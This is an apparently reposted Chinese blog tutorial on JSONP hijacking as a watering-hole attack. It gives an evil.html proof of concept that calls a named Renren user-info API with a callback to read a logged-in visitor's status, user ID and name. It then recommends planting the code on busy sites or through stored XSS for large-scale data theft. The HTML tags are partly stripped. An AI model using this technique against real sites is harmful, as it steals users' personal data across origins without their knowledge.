其他分享
首页 > 其他分享> > 水坑攻击之Jsonp hijacking-信息劫持,在钓鱼页面上调用js代码来获取用户在某些敏感站点的个人信息(如人人等)

水坑攻击之Jsonp hijacking-信息劫持,在钓鱼页面上调用js代码来获取用户在某些敏感站点的个人信息(如人人等)

作者:互联网

水坑攻击之Jsonp hijacking-信息劫持

2018年1月26日 admin%1 $ S

        0X01 Jsonp hijacking作用

这是一种基于水坑攻击的攻击方式,用于大规模的获取用户信息,因为可以绕过同源策略的限制而展开,所以其威力巨大,尤其是在一些大型网站的接口处,用此方法可以盗取已登陆用户的敏感信息从而进行进一步的攻击。

0x02 劫持原理

在说原理之前,首先需要了解js中callback函数的作用,callback是js中的回调函数,这个函数的用处在于它自己是个函数,但是他会将自己作为参数传给另一个函数,并且在父函数执行完成之后再执行。

借用这个原理,我们来试试跨域加载数据:

这是人人网的一个接口,用于显示用户信息

在没登陆的时候,可以看到图中的信息,提示未登陆用户。然后我们本地构造劫持代码,建立evil.html文件。

  <body>

<>

function run(obj){

document.write(obj.status);

}

</>

< src="http://base.yx.renren.com/RestAPI?method=api.base.getLoginUser&format=2&callback=run"></>

</body

注意到我在url中添加了参数callback=run,这样就会导致url在被加载完成之后会继续加载我们的run函数,本地访问网页:

输出了-110,可以看到,我们成功跨域加载了数据到本地域中,但是这有什么作用呢?还是以一个例子尝试,我们登录人人网后来访问这个API

可以看到,返回了用户的敏感信息,我们根据此json返回数据来修改我们的恶意代码文件evil.html<body>

  <>

function run(obj){

document.write(obj.status+"<br/>"+obj.user.userId+"<br/>"+obj.user.userName);

}

</>

< src="http://base.yx.renren.com/RestAPI?method=api.base.getLoginUser&format=2&callback=run"></>

</body>

本地访问evil.html

成功在本地域劫持到用户信息。这个漏洞的利用条件就是需要用户访问我们构造的恶意界面,当然如果我们将这些代码放在用户访问量比较大的网站上,其成功率就可大大提高。至于如何将本地的劫持到的数据存储下来,就没必要多说了。

0x03结论

这种技术想来也是用在APT攻击中的,而且是大规模的数据窃取,作为一种技术手段还是很有用的,不过首先你要有一个大型网站的存储xss或者你自己的博客比较火火火火……

*信息源:http://www.stardustsky.net/post/25.html

*铸剑网络安全实验室CSNS-Lab

标签:劫持,obj,hijacking,用户,js,callback,Jsonp,run,函数
来源: https://www.cnblogs.com/bonelee/p/15200235.html